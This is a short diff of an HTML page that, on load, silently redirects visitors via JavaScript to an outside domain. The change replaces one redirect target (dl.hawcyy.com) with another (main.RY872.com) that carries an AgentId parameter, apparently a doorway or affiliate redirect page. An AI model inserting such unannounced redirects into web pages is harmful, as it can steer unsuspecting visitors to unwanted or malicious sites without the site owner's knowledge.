--- a/379873.html
+++ b/379873.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=379873&t=1592881169"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
